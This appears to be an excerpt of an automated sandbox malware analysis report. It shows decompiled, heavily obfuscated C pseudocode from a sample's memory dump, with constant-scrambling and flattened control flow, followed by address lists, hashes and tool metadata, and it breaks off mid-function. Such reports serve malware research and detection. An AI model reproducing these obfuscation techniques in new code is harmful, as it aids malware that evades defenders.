				intOrPtr _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				void* __ecx;
				intOrPtr _t400;
				void* _t407;
				signed int _t410;
				intOrPtr _t421;
				signed int _t423;
				signed int _t424;
				signed int _t425;
				signed int _t426;
				signed int _t427;
				signed int _t428;
				signed int _t429;
				signed int _t430;
				signed int _t431;
				signed int _t432;
				signed int _t433;
				intOrPtr _t434;
				void* _t473;
				intOrPtr* _t482;
				signed int _t485;
				signed int* _t491;
				void* _t493;

				_push(_a16);
				_push(_a12);
				_v16 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E006920B9(__edx);
				_v72 = 0xfd05e7;
				_t491 =  &(( &_v192)[6]);
				_v72 = _v72 | 0xfdc7c414;
				_v72 = _v72 ^ 0xfdffc5f6;
				_t489 = 0;
				_v128 = 0x159cf;
				_t421 = 0;
				_v128 = _v128 + 0x2543;
				_t485 = 0x8939926;
				_v128 = _v128 ^ 0xc1c453fb;
				_v128 = _v128 ^ 0xc1c52ce8;
				_v188 = 0xc0a375;
				_t423 = 0x5a;
				_v188 = _v188 / _t423;
				_v188 = _v188 + 0xf5e3;
				_v188 = _v188 + 0xffffba7d;
				_v188 = _v188 ^ 0x0002d452;
				_v192 = 0xeb0e91;
				_v192 = _v192 << 0xb;
				_v192 = _v192 >> 0xd;
				_v192 = _v192 | 0x4be38997;
				_v192 = _v192 ^ 0x4be25280;
				_v52 = 0x3397e5;
				_v52 = _v52 ^ 0x345a01ed;
				_v52 = _v52 ^ 0x346a35aa;
				_v60 = 0x140ff9;
				_t424 = 6;
				_v60 = _v60 / _t424;
				_v60 = _v60 ^ 0x000ad59a;
				_v168 = 0x6059cb;
				_t425 = 0x1a;
				_v168 = _v168 * 0x7f;
				_v168 = _v168 / _t425;
				_v168 = _v168 * 0x21;
				_v168 = _v168 ^ 0x3ca5e455;
				_v112 = 0x1e6ccd;
				_v112 = _v112 << 0xc;
				_v112 = _v112 + 0xffff3925;
				_v112 = _v112 ^ 0xe6c2746b;
				_v44 = 0xb8d15a;
				_v44 = _v44 >> 0xb;
				_v44 = _v44 ^ 0x0008fc1e;
				_v172 = 0x2478d;
				_v172 = _v172 ^ 0x68bbc6f8;
				_v172 = _v172 >> 0xc;
				_v172 = _v172 | 0x6f66efc5;
				_v172 = _v172 ^ 0x6f64ef75;
				_v116 = 0x51a99f;
				_v116 = _v116 | 0x1f129b6c;
				_v116 = _v116 ^ 0xc118cdce;
				_v116 = _v116 ^ 0xde47442a;
				_v132 = 0x216e1a;
				_v132 = _v132 + 0xffff43fb;
				_v132 = _v132 ^ 0x7008f7db;
				_v132 = _v132 ^ 0x702542ff;
				_v84 = 0xc91edc;
				_t426 = 0x5e;
				_v84 = _v84 / _t426;
				_v84 = _v84 ^ 0x0006a22a;
				_v164 = 0xa7de11;
				_v164 = _v164 + 0xffff6841;
				_v164 = _v164 >> 4;
				_v164 = _v164 << 3;
				_v164 = _v164 ^ 0x005f8816;
				_v108 = 0xdd6066;
				_v108 = _v108 >> 8;
				_v108 = _v108 << 8;
				_v108 = _v108 ^ 0x00d87344;
				_v92 = 0x21cc88;
				_v92 = _v92 ^ 0xd81b96af;
				_v92 = _v92 ^ 0xd8329727;
				_v96 = 0xbd6d4e;
				_t427 = 0x26;
				_v96 = _v96 / _t427;
				_v96 = _v96 ^ 0x00061825;
				_v24 = 0x6502ac;
				_v24 = _v24 << 4;
				_v24 = _v24 ^ 0x065de4e3;
				_v56 = 0x642336;
				_v56 = _v56 + 0xffffd3db;
				_v56 = _v56 ^ 0x006ffb84;
				_v68 = 0x348f1;
				_t428 = 0x55;
				_v68 = _v68 / _t428;
				_v68 = _v68 ^ 0x0008f449;
				_v76 = 0x3c74f1;
				_v76 = _v76 + 0xffff407e;
				_v76 = _v76 ^ 0x003b6445;
				_v88 = 0xc452b0;
				_v88 = _v88 + 0xffff3a6d;
				_v88 = _v88 ^ 0x00c8dd7a;
				_v48 = 0xc68c2;
				_t429 = 0x57;
				_v48 = _v48 / _t429;
				_v48 = _v48 ^ 0x0008f98a;
				_v100 = 0x631361;
				_v100 = _v100 | 0x5af5ab8e;
				_v100 = _v100 ^ 0x5affcbc5;
				_v148 = 0x1761a;
				_v148 = _v148 ^ 0xebf93349;
				_v148 = _v148 >> 4;
				_v148 = _v148 ^ 0x0eb625e6;
				_v40 = 0xe5378a;
				_v40 = _v40 >> 2;
				_v40 = _v40 ^ 0x003c8b43;
				_v140 = 0x73545;
				_t430 = 0x61;
				_v140 = _v140 * 0x21;
				_v140 = _v140 / _t430;
				_v140 = _v140 ^ 0x0002b6d6;
				_v80 = 0x39d04;
				_v80 = _v80 >> 4;
				_v80 = _v80 ^ 0x00009cd0;
				_v156 = 0x1ba0aa;
				_v156 = _v156 + 0x716e;
				_v156 = _v156 << 0xd;
				_v156 = _v156 ^ 0xb6bcbcaf;
				_v156 = _v156 ^ 0x34f57f5f;
				_v20 = 0xda4179;
				_t431 = 0x27;
				_t482 = _v16;
				_v20 = _v20 / _t431;
				_v20 = _v20 ^ 0x00092493;
				_v32 = 0x6dc25;
				_v32 = _v32 >> 0xf;
				_v32 = _v32 ^ 0x0008149e;
				_v180 = 0x3ec4dc;
				_v180 = _v180 >> 5;
				_t432 = 0x70;
				_v180 = _v180 / _t432;
				_v180 = _v180 + 0xffff18e8;
				_v180 = _v180 ^ 0xfff4c632;
				_v64 = 0xea19a3;
				_v64 = _v64 | 0xee52e837;
				_v64 = _v64 ^ 0xeef909eb;
				_v28 = 0xcaf9fa;
				_v28 = _v28 >> 0xe;
				_v28 = _v28 ^ 0x000e6f4e;
				_v120 = 0x563e36;
				_v120 = _v120 >> 0xe;
				_v120 = _v120 << 5;
				_v120 = _v120 ^ 0x00027d23;
				_v176 = 0x87c40f;
				_v176 = _v176 ^ 0xb401f56c;
				_v176 = _v176 + 0xffff7429;
				_v176 = _v176 | 0xf3ec0d69;
				_v176 = _v176 ^ 0xf7eb47c6;
				_v184 = 0x47488d;
				_v184 = _v184 >> 0xf;
				_v184 = _v184 << 0xf;
				_v184 = _v184 << 1;
				_v184 = _v184 ^ 0x0086c0ad;
				_v136 = 0xb24629;
				_v136 = _v136 | 0x7ef33f67;
				_v136 = _v136 ^ 0x7ef17c1c;
				_v144 = 0xba01aa;
				_v144 = _v144 | 0x3cf3a1ff;
				_v144 = _v144 ^ 0x3cf83085;
				_v124 = 0xbe6d5e;
				_v124 = _v124 + 0xffff96e9;
				_v124 = _v124 | 0xcf3d3218;
				_v124 = _v124 ^ 0xcfb1306a;
				_v36 = 0xa69a94;
				_v36 = _v36 + 0xffffed5e;
				_v36 = _v36 ^ 0x00a0b8ce;
				_v104 = 0xa8033b;
				_t433 = 9;
				_v104 = _v104 / _t433;
				_v104 = _v104 >> 6;
				_v104 = _v104 ^ 0x0005e2c3;
				while(1) {
					L1:
					_t434 = _v160;
					while(1) {
						_t400 = _v152;
						while(1) {
							L3:
							_t493 = _t485 - 0xa1723c1;
							if(_t493 > 0) {
								goto L19;
							}
							L4:
							if(_t493 == 0) {
								E00698519(_v144, _v124, _t489);
								_t485 = 0x4b7559b;
								goto L17;
							} else {
								if(_t485 == 0x4b7559b) {
									return E00698519(_v36, _v104, _t421);
								}
								if(_t485 == 0x4ed616e) {
									_t441 = _v172;
									_t407 = E006916AF(_v172,  &_v12, _v116, _v132, _t434, _a8, _t421, _v84, _t434,  &_v4, _t434, _v164, _v108, _v92, _v96, _t434, _t434, _v24, _t434, _v56);
									_t491 =  &(_t491[0x12]);
									if(_t407 == 0) {
										L16:
										_t485 = 0xa1723c1;
										L17:
										_t400 = _v152;
									} else {
										_t410 = E0069D25E(_t441);
										_t485 = 0x9a40434;
										_t400 = _v12 * 0x2c + _t421;
										_v152 = _t400;
										_t482 =  >=  ? _t421 : (_t410 & 0x0000001f) * 0x2c + _t421;
									}
									_t434 = _v160;
									_t473 = 0x6a50b97;
									continue;
								} else {
									if(_t485 == _t473) {
										E00692007(_v72, _v40, _v140, _t434, _v80,  &_v8, _v156, _t434, _t489, _v20);
										_t485 =  !=  ? 0xd1a593f : 0xb29ddc7;
										_t400 = E00698F9E(_v32, _v180, _v64, _v28, _v160);
										_t491 =  &(_t491[0xb]);
										L30:
										_t473 = 0x6a50b97;
										goto L31;
									} else {
										if(_t485 == 0x8939926) {
											_t485 = 0xe60f9b1;
											continue;
										} else {
											if(_t485 != 0x9a40434) {
												L31:
												if(_t485 != 0x88fb243) {
													goto L1;
												}
											} else {
												_t434 = E006842C4(_v88, _a8, _v48, _v188,  *_t482, _v100, _v148);
												_t491 =  &(_t491[5]);
												_v160 = _t434;
												_t473 = 0x6a50b97;
												_t485 =  !=  ? 0x6a50b97 : 0xb29ddc7;
												_t400 = _v152;
												while(1) {
													L3:
													_t493 = _t485 - 0xa1723c1;
													if(_t493 > 0) {
														goto L19;
													}
													goto L4;
												}
												goto L19;
											}
										}
									}
								}
							}
							L34:
							return _t400;
							L19:
							if(_t485 == 0xaf524c8) {
								_push(_t434);
								_push(_t434);
								_t400 = E00687FF2(0x2000);
								_t489 = _t400;
								if(_t400 == 0) {
									_t485 = 0x4b7559b;
									goto L30;
								} else {
									_t485 = 0x4ed616e;
									goto L17;
								}
							} else {
								if(_t485 == 0xb29ddc7) {
									_t482 = _t482 + 0x2c;
									asm("sbb esi, esi");
									_t485 = (_t485 & 0xff8ce073) + 0xa1723c1;
									continue;
								} else {
									_t400 = 0xd1a593f;
									if(_t485 == 0xd1a593f) {
										E0068DF6F(_v120, _v176, _v128, _v16, _v184, _v136, _t489);
										_t491 =  &(_t491[5]);
										goto L16;
									} else {
										if(_t485 != 0xe60f9b1) {
											goto L31;
										} else {
											_push(_t434);
											_push(_t434);
											_t400 = E00687FF2(0x20000);
											_t421 = 0xd1a593f;
											if(0xd1a593f != 0) {
												_t485 = 0xaf524c8;
												goto L17;
											}
										}
									}
								}
							}
							goto L34;
						}
					}
				}
			}









































































                                                                                                                      0x0068d6e2
                                                                                                                      0x0068d6eb
                                                                                                                      0x0068d6f2
                                                                                                                      0x0068d6f9
                                                                                                                      0x0068d700
                                                                                                                      0x0068d707
                                                                                                                      0x0068d709
                                                                                                                      0x0068d70e
                                                                                                                      0x0068d719
                                                                                                                      0x0068d71c
                                                                                                                      0x0068d729
                                                                                                                      0x0068d734
                                                                                                                      0x0068d736
                                                                                                                      0x0068d73e
                                                                                                                      0x0068d740
                                                                                                                      0x0068d748
                                                                                                                      0x0068d74d
                                                                                                                      0x0068d755
                                                                                                                      0x0068d75d
                                                                                                                      0x0068d76b
                                                                                                                      0x0068d770
                                                                                                                      0x0068d776
                                                                                                                      0x0068d77e
                                                                                                                      0x0068d786
                                                                                                                      0x0068d78e
                                                                                                                      0x0068d796
                                                                                                                      0x0068d79b
                                                                                                                      0x0068d7a0
                                                                                                                      0x0068d7a8
                                                                                                                      0x0068d7b0
                                                                                                                      0x0068d7bb
                                                                                                                      0x0068d7c6
                                                                                                                      0x0068d7d1
                                                                                                                      0x0068d7e3
                                                                                                                      0x0068d7e8
                                                                                                                      0x0068d7f1
                                                                                                                      0x0068d7fc
                                                                                                                      0x0068d809
                                                                                                                      0x0068d80a
                                                                                                                      0x0068d814
                                                                                                                      0x0068d81d
                                                                                                                      0x0068d821
                                                                                                                      0x0068d829
                                                                                                                      0x0068d831
                                                                                                                      0x0068d836
                                                                                                                      0x0068d83e
                                                                                                                      0x0068d846
                                                                                                                      0x0068d851
                                                                                                                      0x0068d859
                                                                                                                      0x0068d864
                                                                                                                      0x0068d86c
                                                                                                                      0x0068d874
                                                                                                                      0x0068d879
                                                                                                                      0x0068d881
                                                                                                                      0x0068d889
                                                                                                                      0x0068d891
                                                                                                                      0x0068d899
                                                                                                                      0x0068d8a1
                                                                                                                      0x0068d8a9
                                                                                                                      0x0068d8b1
                                                                                                                      0x0068d8b9
                                                                                                                      0x0068d8c1
                                                                                                                      0x0068d8cb
                                                                                                                      0x0068d8d9
                                                                                                                      0x0068d8de
                                                                                                                      0x0068d8e7
                                                                                                                      0x0068d8f2
                                                                                                                      0x0068d8fa
                                                                                                                      0x0068d902
                                                                                                                      0x0068d907
                                                                                                                      0x0068d90c
                                                                                                                      0x0068d914
                                                                                                                      0x0068d91c
                                                                                                                      0x0068d921
                                                                                                                      0x0068d926
                                                                                                                      0x0068d92e
                                                                                                                      0x0068d936
                                                                                                                      0x0068d93e
                                                                                                                      0x0068d946
                                                                                                                      0x0068d952
                                                                                                                      0x0068d957
                                                                                                                      0x0068d95d
                                                                                                                      0x0068d965
                                                                                                                      0x0068d970
                                                                                                                      0x0068d978
                                                                                                                      0x0068d983
                                                                                                                      0x0068d98e
                                                                                                                      0x0068d999
                                                                                                                      0x0068d9a4
                                                                                                                      0x0068d9b6
                                                                                                                      0x0068d9bb
                                                                                                                      0x0068d9c4
                                                                                                                      0x0068d9cf
                                                                                                                      0x0068d9da
                                                                                                                      0x0068d9e5
                                                                                                                      0x0068d9f0
                                                                                                                      0x0068d9f8
                                                                                                                      0x0068da00
                                                                                                                      0x0068da08
                                                                                                                      0x0068da1a
                                                                                                                      0x0068da1f
                                                                                                                      0x0068da28
                                                                                                                      0x0068da33
                                                                                                                      0x0068da3b
                                                                                                                      0x0068da43
                                                                                                                      0x0068da4b
                                                                                                                      0x0068da53
                                                                                                                      0x0068da5b
                                                                                                                      0x0068da60
                                                                                                                      0x0068da68
                                                                                                                      0x0068da73
                                                                                                                      0x0068da7b
                                                                                                                      0x0068da86
                                                                                                                      0x0068da93
                                                                                                                      0x0068da94
                                                                                                                      0x0068da9e
                                                                                                                      0x0068daa2
                                                                                                                      0x0068daaa
                                                                                                                      0x0068dab5
                                                                                                                      0x0068dabd
                                                                                                                      0x0068dac8
                                                                                                                      0x0068dad0
                                                                                                                      0x0068dada
                                                                                                                      0x0068dadf
                                                                                                                      0x0068dae7
                                                                                                                      0x0068daef
                                                                                                                      0x0068db03
                                                                                                                      0x0068db08
                                                                                                                      0x0068db0f
                                                                                                                      0x0068db16
                                                                                                                      0x0068db21
                                                                                                                      0x0068db2c
                                                                                                                      0x0068db34
                                                                                                                      0x0068db3f
                                                                                                                      0x0068db47
                                                                                                                      0x0068db52
                                                                                                                      0x0068db57
                                                                                                                      0x0068db5b
                                                                                                                      0x0068db63
                                                                                                                      0x0068db6b
                                                                                                                      0x0068db76
                                                                                                                      0x0068db81
                                                                                                                      0x0068db8c
                                                                                                                      0x0068db97
                                                                                                                      0x0068db9f
                                                                                                                      0x0068dbaa
                                                                                                                      0x0068dbb2
                                                                                                                      0x0068dbb7
                                                                                                                      0x0068dbbc
                                                                                                                      0x0068dbc4
                                                                                                                      0x0068dbcc
                                                                                                                      0x0068dbd4
                                                                                                                      0x0068dbdc
                                                                                                                      0x0068dbe4
                                                                                                                      0x0068dbec
                                                                                                                      0x0068dbf4
                                                                                                                      0x0068dbf9
                                                                                                                      0x0068dbfe
                                                                                                                      0x0068dc02
                                                                                                                      0x0068dc0a
                                                                                                                      0x0068dc12
                                                                                                                      0x0068dc1a
                                                                                                                      0x0068dc22
                                                                                                                      0x0068dc2a
                                                                                                                      0x0068dc32
                                                                                                                      0x0068dc3a
                                                                                                                      0x0068dc42
                                                                                                                      0x0068dc4a
                                                                                                                      0x0068dc52
                                                                                                                      0x0068dc5a
                                                                                                                      0x0068dc65
                                                                                                                      0x0068dc70
                                                                                                                      0x0068dc7b
                                                                                                                      0x0068dc89
                                                                                                                      0x0068dc91
                                                                                                                      0x0068dc95
                                                                                                                      0x0068dc9a
                                                                                                                      0x0068dca2
                                                                                                                      0x0068dca2
                                                                                                                      0x0068dca2
                                                                                                                      0x0068dca6
                                                                                                                      0x0068dca6
                                                                                                                      0x0068dcaa
                                                                                                                      0x0068dcaa
                                                                                                                      0x0068dcaa
                                                                                                                      0x0068dcb0
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0068dcb6
                                                                                                                      0x0068dcb6
                                                                                                                      0x0068de66
                                                                                                                      0x0068de6c
                                                                                                                      0x00000000
                                                                                                                      0x0068dcbc
                                                                                                                      0x0068dcc2
                                                                                                                      0x00000000
                                                                                                                      0x0068df63
                                                                                                                      0x0068dcce
                                                                                                                      0x0068de01
                                                                                                                      0x0068de05
                                                                                                                      0x0068de0a
                                                                                                                      0x0068de0f
                                                                                                                      0x0068de52
                                                                                                                      0x0068de52
                                                                                                                      0x0068de57
                                                                                                                      0x0068de57
                                                                                                                      0x0068de11
                                                                                                                      0x0068de1f
                                                                                                                      0x0068de27
                                                                                                                      0x0068de39
                                                                                                                      0x0068de3d
                                                                                                                      0x0068de41
                                                                                                                      0x0068de41
                                                                                                                      0x0068de44
                                                                                                                      0x0068de48
                                                                                                                      0x00000000
                                                                                                                      0x0068dcd4
                                                                                                                      0x0068dcd6
                                                                                                                      0x0068dd6a
                                                                                                                      0x0068dd91
                                                                                                                      0x0068dd9b
                                                                                                                      0x0068dda0
                                                                                                                      0x0068df40
                                                                                                                      0x0068df40
                                                                                                                      0x00000000
                                                                                                                      0x0068dcd8
                                                                                                                      0x0068dcde
                                                                                                                      0x0068dd31
                                                                                                                      0x00000000
                                                                                                                      0x0068dce0
                                                                                                                      0x0068dce6
                                                                                                                      0x0068df45
                                                                                                                      0x0068df4b
                                                                                                                      0x00000000
                                                                                                                      0x0068df4d
                                                                                                                      0x0068dcec
                                                                                                                      0x0068dd14
                                                                                                                      0x0068dd16
                                                                                                                      0x0068dd1b
                                                                                                                      0x0068dd24
                                                                                                                      0x0068dd29
                                                                                                                      0x0068dca6
                                                                                                                      0x0068dcaa
                                                                                                                      0x0068dcaa
                                                                                                                      0x0068dcaa
                                                                                                                      0x0068dcb0
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0068dcb0
                                                                                                                      0x00000000
                                                                                                                      0x0068dcaa
                                                                                                                      0x0068dce6
                                                                                                                      0x0068dcde
                                                                                                                      0x0068dcd6
                                                                                                                      0x0068dcce
                                                                                                                      0x0068df6e
                                                                                                                      0x0068df6e
                                                                                                                      0x0068de73
                                                                                                                      0x0068de79
                                                                                                                      0x0068df22
                                                                                                                      0x0068df23
                                                                                                                      0x0068df24
                                                                                                                      0x0068df29
                                                                                                                      0x0068df2f
                                                                                                                      0x0068df3b
                                                                                                                      0x00000000
                                                                                                                      0x0068df31
                                                                                                                      0x0068df31
                                                                                                                      0x00000000
                                                                                                                      0x0068df31
                                                                                                                      0x0068de7f
                                                                                                                      0x0068de85
                                                                                                                      0x0068def6
                                                                                                                      0x0068defb
                                                                                                                      0x0068df03
                                                                                                                      0x00000000
                                                                                                                      0x0068de87
                                                                                                                      0x0068de87
                                                                                                                      0x0068de8e
                                                                                                                      0x0068dee9
                                                                                                                      0x0068deee
                                                                                                                      0x00000000
                                                                                                                      0x0068de90
                                                                                                                      0x0068de96
                                                                                                                      0x00000000
                                                                                                                      0x0068de9c
                                                                                                                      0x0068deb3
                                                                                                                      0x0068deb4
                                                                                                                      0x0068deb5
                                                                                                                      0x0068deba
                                                                                                                      0x0068dec0
                                                                                                                      0x0068dec6
                                                                                                                      0x00000000
                                                                                                                      0x0068dec6
                                                                                                                      0x0068dec0
                                                                                                                      0x0068de96
                                                                                                                      0x0068de8e
                                                                                                                      0x0068de85
                                                                                                                      0x00000000
                                                                                                                      0x0068de79
                                                                                                                      0x0068dcaa
                                                                                                                      0x0068dca6

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 6#d$6>V$7R$C%$Ed;$nq$udo
                                                                                                                      • API String ID: 0-652707834
                                                                                                                      • Opcode ID: f1ebdc49b849bf8c904815538ebaa2ee5cbb6585970c67cf9760e8e328c8f8b3
                                                                                                                      • Instruction ID: 48ec8ed70b47df77f24beb19bc3f917d992fed2e1222469e1836eeaff11ce94c
                                                                                                                      • Opcode Fuzzy Hash: f1ebdc49b849bf8c904815538ebaa2ee5cbb6585970c67cf9760e8e328c8f8b3
                                                                                                                      • Instruction Fuzzy Hash: 8B12337250C3809FD368DF25C48AA9FBBE2BBC4344F108A1DE5C986260D7B18949CF53
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 006881B7 Relevance: 9.1, Strings: 7, Instructions: 349COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 98%
                                                                                                                      			E006881B7() {
				void* _t347;
				signed int _t350;
				signed int _t351;
				signed int _t353;
				signed int _t355;
				signed int _t360;
				signed int _t364;
				void* _t374;
				intOrPtr _t407;
				signed int _t411;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				signed int _t417;
				signed int _t418;
				signed int _t419;
				signed int _t420;
				signed int* _t422;
				void* _t426;

				 *(_t426 + 0x74) = 0xd212a7;
				 *(_t426 + 0x74) =  *(_t426 + 0x74) ^ 0x52eac678;
				_t374 = 0xebf23c2;
				 *(_t426 + 0x74) =  *(_t426 + 0x74) ^ 0x5238d4de;
				 *(_t426 + 0x20) = 0x60274e;
				 *(_t426 + 0x20) =  *(_t426 + 0x20) >> 4;
				_t414 = 0x29;
				 *(_t426 + 0x34) =  *(_t426 + 0x20) / _t414;
				 *(_t426 + 0x34) =  *(_t426 + 0x34) + 0x7a4c;
				 *(_t426 + 0x34) =  *(_t426 + 0x34) ^ 0x00009fd0;
				 *(_t426 + 0x9c) = 0x5f71eb;
				 *(_t426 + 0x9c) =  *(_t426 + 0x9c) ^ 0x01156387;
				 *(_t426 + 0x9c) =  *(_t426 + 0x9c) ^ 0x014a126f;
				 *(_t426 + 0x1c) = 0x8735e4;
				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) >> 0xe;
				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) << 3;
				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) >> 4;
				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) ^ 0x000153b5;
				 *(_t426 + 0x58) = 0x9ed5c5;
				_t415 = 0x17;
				 *(_t426 + 0xa0) =  *(_t426 + 0xa0) & 0x00000000;
				 *(_t426 + 0x54) =  *(_t426 + 0x58) * 0x5d;
				 *(_t426 + 0x54) =  *(_t426 + 0x54) ^ 0xb1e1bce9;
				 *(_t426 + 0x54) =  *(_t426 + 0x54) ^ 0x88583d56;
				 *(_t426 + 0x5c) = 0x8fe0dc;
				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) + 0xffff3edc;
				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) / _t415;
				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) ^ 0x00095c01;
				 *(_t426 + 0x48) = 0x18253c;
				 *(_t426 + 0x48) =  *(_t426 + 0x48) + 0xf9f1;
				 *(_t426 + 0x48) =  *(_t426 + 0x48) << 7;
				 *(_t426 + 0x48) =  *(_t426 + 0x48) ^ 0x0c842cab;
				 *(_t426 + 0x94) = 0x40d4a3;
				 *(_t426 + 0x94) =  *(_t426 + 0x94) << 5;
				 *(_t426 + 0x94) =  *(_t426 + 0x94) ^ 0x081e10bd;
				 *(_t426 + 0x20) = 0x8fc5ff;
				 *(_t426 + 0x20) =  *(_t426 + 0x20) >> 4;
				 *(_t426 + 0x20) =  *(_t426 + 0x20) ^ 0x245daa70;
				 *(_t426 + 0x20) =  *(_t426 + 0x20) ^ 0xfc587561;
				 *(_t426 + 0x20) =  *(_t426 + 0x20) ^ 0xd80c07a2;
				 *(_t426 + 0x38) = 0x52431;
				 *(_t426 + 0x38) =  *(_t426 + 0x38) * 0x31;
				 *(_t426 + 0x38) =  *(_t426 + 0x38) ^ 0xfa9954a0;
				 *(_t426 + 0x38) =  *(_t426 + 0x38) + 0xffff6dd1;
				 *(_t426 + 0x38) =  *(_t426 + 0x38) ^ 0xfa6f2662;
				 *(_t426 + 0x44) = 0xc4652;
				 *(_t426 + 0x44) =  *(_t426 + 0x44) + 0xffff61fe;
				 *(_t426 + 0x44) =  *(_t426 + 0x44) >> 4;
				 *(_t426 + 0x44) =  *(_t426 + 0x44) ^ 0x0000c191;
				 *(_t426 + 0x10) = 0x2c06e;
				 *(_t426 + 0x10) =  *(_t426 + 0x10) + 0xffffb3fc;
				 *(_t426 + 0x10) =  *(_t426 + 0x10) * 0x27;
				 *(_t426 + 0x10) =  *(_t426 + 0x10) + 0xbfb5;
				 *(_t426 + 0x10) =  *(_t426 + 0x10) ^ 0x00679be9;
				 *(_t426 + 0x7c) = 0xc3ec9d;
				 *(_t426 + 0x7c) =  *(_t426 + 0x7c) << 7;
				 *(_t426 + 0x7c) =  *(_t426 + 0x7c) ^ 0x61f5edc1;
				 *(_t426 + 0x70) = 0x3416d6;
				 *(_t426 + 0x70) =  *(_t426 + 0x70) << 3;
				 *(_t426 + 0x70) =  *(_t426 + 0x70) ^ 0x01aaf790;
				 *(_t426 + 0x64) = 0x1e8df6;
				 *(_t426 + 0x64) =  *(_t426 + 0x64) | 0x232ea122;
				 *(_t426 + 0x64) =  *(_t426 + 0x64) * 0x6c;
				 *(_t426 + 0x64) =  *(_t426 + 0x64) ^ 0xde707d95;
				 *(_t426 + 0x28) = 0xebc79e;
				 *(_t426 + 0x28) =  *(_t426 + 0x28) | 0xfe2cd41a;
				 *(_t426 + 0x28) =  *(_t426 + 0x28) + 0xffff955f;
				 *(_t426 + 0x28) =  *(_t426 + 0x28) + 0xf79a;
				 *(_t426 + 0x28) =  *(_t426 + 0x28) ^ 0xfef90bb7;
				 *(_t426 + 0x4c) = 0x6795aa;
				 *(_t426 + 0x4c) =  *(_t426 + 0x4c) >> 5;
				 *(_t426 + 0x4c) =  *(_t426 + 0x4c) + 0xffffddd4;
				 *(_t426 + 0x4c) =  *(_t426 + 0x4c) ^ 0x0005ee09;
				 *(_t426 + 0x50) = 0xbc4be8;
				 *(_t426 + 0x50) =  *(_t426 + 0x50) ^ 0xc40dbfb1;
				_t416 = 0x6f;
				 *(_t426 + 0x54) =  *(_t426 + 0x50) * 0x3a;
				 *(_t426 + 0x54) =  *(_t426 + 0x54) ^ 0x9054da47;
				 *(_t426 + 0x94) = 0xde468f;
				 *(_t426 + 0x94) =  *(_t426 + 0x94) + 0xffff1011;
				 *(_t426 + 0x94) =  *(_t426 + 0x94) ^ 0x00dd868e;
				 *(_t426 + 0x18) = 0x6e4fa6;
				 *(_t426 + 0x18) =  *(_t426 + 0x18) >> 8;
				 *(_t426 + 0x18) =  *(_t426 + 0x18) ^ 0x937c1de8;
				 *(_t426 + 0x18) =  *(_t426 + 0x18) | 0x0d58262f;
				 *(_t426 + 0x18) =  *(_t426 + 0x18) ^ 0x9f7b4471;
				 *(_t426 + 0x5c) = 0xc77145;
				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) + 0x9c58;
				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) / _t416;
				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) ^ 0x0006cc79;
				 *(_t426 + 0x44) = 0x492c53;
				 *(_t426 + 0x44) =  *(_t426 + 0x44) | 0x932025a2;
				 *(_t426 + 0x44) =  *(_t426 + 0x44) << 0xb;
				 *(_t426 + 0x44) =  *(_t426 + 0x44) ^ 0x496991d6;
				 *(_t426 + 0xa0) = 0x27589;
				_t417 = 0x3e;
				 *(_t426 + 0xa0) =  *(_t426 + 0xa0) * 0x6d;
				 *(_t426 + 0xa0) =  *(_t426 + 0xa0) ^ 0x010c563c;
				 *(_t426 + 0x30) = 0xb4bbc8;
				 *(_t426 + 0x30) =  *(_t426 + 0x30) / _t417;
				 *(_t426 + 0x30) =  *(_t426 + 0x30) + 0xffff42d9;
				 *(_t426 + 0x30) =  *(_t426 + 0x30) + 0x5120;
				 *(_t426 + 0x30) =  *(_t426 + 0x30) ^ 0x000b6c85;
				 *(_t426 + 0x28) = 0xdf5b34;
				 *(_t426 + 0x28) =  *(_t426 + 0x28) ^ 0xb2734269;
				_t418 = 0x5e;
				 *(_t426 + 0x28) =  *(_t426 + 0x28) / _t418;
				 *(_t426 + 0x28) =  *(_t426 + 0x28) << 6;
				 *(_t426 + 0x28) =  *(_t426 + 0x28) ^ 0x79ab34c2;
				 *(_t426 + 0x90) = 0xff684d;
				 *(_t426 + 0x90) =  *(_t426 + 0x90) | 0x9d6c2ae6;
				 *(_t426 + 0x90) =  *(_t426 + 0x90) ^ 0x9df0e455;
				 *(_t426 + 0x20) = 0x90e304;
				_t419 = 0x7f;
				 *(_t426 + 0x1c) =  *(_t426 + 0x20) / _t419;
				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) << 6;
				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) << 0x10;
				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) ^ 0x0384731e;
				 *(_t426 + 0x60) = 0xa4eb1a;
				 *(_t426 + 0x60) =  *(_t426 + 0x60) << 0xc;
				 *(_t426 + 0x60) =  *(_t426 + 0x60) * 0x76;
				 *(_t426 + 0x60) =  *(_t426 + 0x60) ^ 0x45d23c3b;
				 *(_t426 + 0x34) = 0xdaab0d;
				 *(_t426 + 0x34) =  *(_t426 + 0x34) << 0xb;
